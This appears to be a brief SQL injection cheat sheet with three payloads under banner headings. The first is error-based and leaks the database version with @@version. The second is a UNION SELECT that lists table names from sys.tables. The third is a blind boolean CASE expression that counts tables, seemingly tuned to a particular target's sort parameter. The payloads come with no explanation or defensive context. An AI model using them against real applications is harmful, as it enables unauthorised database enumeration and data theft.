=======================================================
=                ERROR SQL INJECTION                  =
=======================================================

' AND 1=@@version--

=======================================================
=                UNION SQL INJECTION                  =
=======================================================

' union select object_id,1,1,name,1,1 from sys.tables--

=======================================================
=             BLIND BOOLEAN SQL INJECTION             =
=======================================================

(case when (select count(*) from sys.tables)=9 then IFSC else Number end)&asc=false